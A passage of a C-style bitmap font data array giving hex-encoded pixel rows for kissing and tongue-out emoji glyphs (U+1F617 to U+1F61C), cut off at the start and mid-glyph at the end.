0x1, 0xe0, 0x38, 0xf, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x60, 0x8, 0x3, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F617 "😗" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x1, 0xe0, 0x0, 0x3,
0xc0, 0x0, 0xe1, 0xc0, 0x1, 0xf8, 0x0, 0x3,
0xf0, 0x0, 0x71, 0xc0, 0x1, 0xfe, 0x0, 0x3,
0xfc, 0x0, 0x3c, 0xe0, 0x0, 0xff, 0x0, 0x1,
0xfe, 0x0, 0xe, 0x70, 0x0, 0x7f, 0x80, 0x0,
0xff, 0x0, 0x7, 0x38, 0x0, 0x3f, 0xc0, 0x0,
0x7f, 0x80, 0x3, 0xb8, 0x0, 0x1f, 0xe0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x7, 0xe0, 0x0,
0xf, 0xc0, 0x0, 0x7e, 0x0, 0x1, 0xe0, 0x0,
0x3, 0xc0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0xf, 0x80, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x7, 0xf0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x3c, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0xe, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x7, 0x80, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0xf, 0x80, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x7, 0xc0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x38, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0xf, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0xf, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x3f, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F618 "😘" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x3c, 0x1, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x3, 0x80, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x7, 0xc0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x7, 0x80, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x7, 0x0, 0x0, 0x0, 0x0,
0x10, 0x7, 0x3, 0x81, 0x80, 0x0, 0x0, 0x0,
0x38, 0x3, 0x83, 0x80, 0x1, 0xe0, 0x0, 0x0,
0x7c, 0x0, 0xe1, 0xc0, 0x1, 0xf8, 0x0, 0x0,
0xfc, 0x0, 0x71, 0xc0, 0x1, 0xfe, 0x0, 0x0,
0xf8, 0x0, 0x38, 0xe0, 0x0, 0xff, 0x0, 0x0,
0xf0, 0x0, 0xe, 0x70, 0x0, 0x7f, 0x80, 0x1,
0xf0, 0x0, 0x7, 0x38, 0x0, 0x3f, 0xc0, 0x1,
0xf8, 0x0, 0x3, 0xb8, 0x0, 0x1f, 0xe0, 0x0,
0xff, 0xe0, 0x1, 0xdc, 0x0, 0x7, 0xe0, 0x0,
0x3f, 0xfc, 0x0, 0x7e, 0x0, 0x1, 0xe0, 0x0,
0x0, 0x1e, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xc0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xf0, 0x3f, 0x80, 0x0, 0x0,
0x7, 0x80, 0xf, 0xfc, 0x1d, 0xc0, 0x0, 0x0,
0x3, 0xf0, 0xf, 0xfe, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x3c, 0x7, 0xff, 0xf8, 0x70, 0x0, 0x0,
0x0, 0xe, 0x3, 0xff, 0xfe, 0x3c, 0x0, 0x0,
0x0, 0x7, 0x1, 0xff, 0xff, 0x8e, 0x0, 0x0,
0x0, 0x7, 0x80, 0xff, 0xff, 0xe7, 0x0, 0x0,
0x0, 0x7, 0x80, 0x7f, 0xff, 0xf1, 0xc0, 0x0,
0x0, 0x3, 0xc0, 0x3f, 0xff, 0xf8, 0xe0, 0x0,
0x0, 0x0, 0xf0, 0xf, 0xff, 0xfc, 0x78, 0x0,
0x0, 0x0, 0x38, 0x7, 0xff, 0xfe, 0x1c, 0x0,
0x0, 0x0, 0x1c, 0x3, 0xff, 0xfe, 0x7, 0x0,
0x0, 0x0, 0xe, 0x1, 0xff, 0xff, 0x3, 0xc0,
0x0, 0x0, 0x7, 0x0, 0xff, 0xff, 0x0, 0xe0,
0x0, 0x0, 0xf, 0x0, 0xff, 0xff, 0x0, 0x38,
0x0, 0x0, 0x1f, 0x0, 0xff, 0xfe, 0x0, 0xe,
0x0, 0x0, 0xe, 0x0, 0xf, 0xf8, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x3, 0xf0, 0x0, 0x3, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x80, 0x1f, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0, 0x0, 0x0,
/* U+1F619 "😙" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x1f, 0x0, 0x0,
0x7c, 0x0, 0x7, 0x38, 0x0, 0x3f, 0xe0, 0x0,
0xff, 0x80, 0x3, 0xb8, 0x0, 0x3c, 0x70, 0x0,
0x70, 0xe0, 0x0, 0xfc, 0x0, 0x18, 0x1c, 0x0,
0x70, 0x30, 0x0, 0x7e, 0x0, 0x1c, 0x6, 0x0,
0x30, 0x1c, 0x0, 0x3f, 0x0, 0xe, 0x3, 0x80,
0x38, 0x6, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x7, 0xe0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x78, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0xe, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x3, 0x80, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x3, 0xc0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x7, 0xc0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x7, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0xf, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x3f, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F61A "😚" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x1, 0xf8, 0x0, 0x1, 0xf0,
0x7, 0x0, 0x1e, 0x7, 0xfc, 0x0, 0x0, 0xff,
0x3, 0xc0, 0xe, 0xf, 0xc0, 0x0, 0x0, 0x7,
0xe0, 0xe0, 0xe, 0xf, 0x0, 0x0, 0x0, 0x0,
0x78, 0x38, 0xf, 0x2, 0x0, 0x0, 0x0, 0x0,
0x8, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x7f, 0x0, 0x0,
0x7f, 0x0, 0x7, 0x38, 0x0, 0xff, 0xe0, 0x0,
0xff, 0xe0, 0x3, 0xb8, 0x0, 0xf0, 0x78, 0x0,
0xf0, 0x78, 0x0, 0xfc, 0x0, 0xe0, 0x1c, 0x0,
0x70, 0xe, 0x0, 0x7e, 0x0, 0x0, 0x4, 0x0,
0x0, 0x2, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x10, 0x0,
0x0, 0x0, 0x20, 0x1, 0xf8, 0x1, 0x99, 0x0,
0x0, 0x1, 0x33, 0x0, 0xfc, 0x0, 0xc9, 0x80,
0x0, 0x1, 0x99, 0x80, 0x7e, 0x0, 0xcc, 0xc0,
0x0, 0x0, 0x89, 0x80, 0x3f, 0x0, 0x64, 0xc0,
0xf, 0x0, 0xcc, 0xc0, 0x3d, 0xc0, 0x66, 0x60,
0x7, 0xe0, 0x64, 0x40, 0x1c, 0xe0, 0x2, 0x0,
0x0, 0x78, 0x6, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0xe, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x3, 0x80, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x3, 0xc0, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x7, 0xc0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x0, 0xe0, 0x78, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x7, 0x0, 0x0, 0x78, 0x0, 0xe0,
0x0, 0x0, 0xf, 0x0, 0x0, 0x38, 0x0, 0x38,
0x0, 0x0, 0x3f, 0x0, 0x0, 0x38, 0x0, 0x1e,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x38, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F61B "😛" */
0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0xf, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0xf, 0x0, 0x0,
0x3c, 0x0, 0x7, 0x38, 0x0, 0xf, 0xc0, 0x0,
0x3f, 0x0, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x3f, 0xc0, 0x1, 0xdc, 0x0, 0x7, 0xf8, 0x0,
0x1f, 0xe0, 0x0, 0x7e, 0x0, 0x3, 0xfc, 0x0,
0xf, 0xf0, 0x0, 0x3f, 0x0, 0x1, 0xfe, 0x0,
0x7, 0xf8, 0x0, 0x1f, 0x80, 0x0, 0xff, 0x0,
0x3, 0xfc, 0x0, 0xf, 0xc0, 0x0, 0x3f, 0x0,
0x0, 0xfc, 0x0, 0x7, 0xe0, 0x0, 0xf, 0x0,
0x0, 0x3c, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1d, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0xe, 0x0,
0x0, 0x0, 0x0, 0xe0, 0xe, 0x70, 0xf, 0xfe,
0x0, 0x0, 0x3f, 0xfc, 0x7, 0x1c, 0xf, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x3, 0x8e, 0x7, 0xff,
0xff, 0xff, 0xff, 0xff, 0x3, 0x87, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0x81, 0xc1, 0xc0, 0xff,
0xe1, 0xff, 0xc3, 0xff, 0xc1, 0xe0, 0xe0, 0x7f,
0xf0, 0x6, 0x1, 0xff, 0xc0, 0xe0, 0x38, 0x3f,
0xf8, 0x3, 0x0, 0xff, 0xe0, 0x70, 0x1c, 0xf,
0xfc, 0x1, 0x80, 0x7f, 0xe0, 0x70, 0x7, 0x3,
0xfe, 0x0, 0xc0, 0x3f, 0xe0, 0x78, 0x1, 0xc0,
0xff, 0x0, 0x60, 0x1f, 0xf0, 0x38, 0x0, 0xe0,
0x3f, 0x80, 0x30, 0xf, 0xf0, 0x3c, 0x0, 0x38,
0xf, 0xc0, 0x18, 0x7, 0xf0, 0x3c, 0x0, 0xe,
0x3, 0xe0, 0xc, 0x3, 0xe0, 0x1c, 0x0, 0x3,
0x80, 0xf0, 0x6, 0x1, 0xe0, 0x1c, 0x0, 0x0,
0xe0, 0x18, 0x3, 0x0, 0xe0, 0x1e, 0x0, 0x0,
0x78, 0xc, 0x1, 0x80, 0x70, 0x1e, 0x0, 0x0,
0xf, 0x6, 0x0, 0x0, 0x38, 0x3e, 0x0, 0x0,
0x3, 0xc3, 0x0, 0x0, 0x1c, 0x3c, 0x0, 0x0,
0x0, 0xf9, 0x80, 0x0, 0xe, 0x7c, 0x0, 0x0,
0x0, 0x1f, 0xe0, 0x0, 0x6, 0x7c, 0x0, 0x0,
0x0, 0x7, 0xf0, 0x0, 0x7, 0xf8, 0x0, 0x0,
0x0, 0x0, 0xfc, 0x0, 0x7, 0xf0, 0x0, 0x0,
0x0, 0x0, 0xf, 0x0, 0x7, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf0, 0xf, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xfc, 0x0, 0x0, 0x0,
0x0,
/* U+1F61C "😜" */
0x0, 0x0, 0x0, 0x3f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0xf, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x3f,
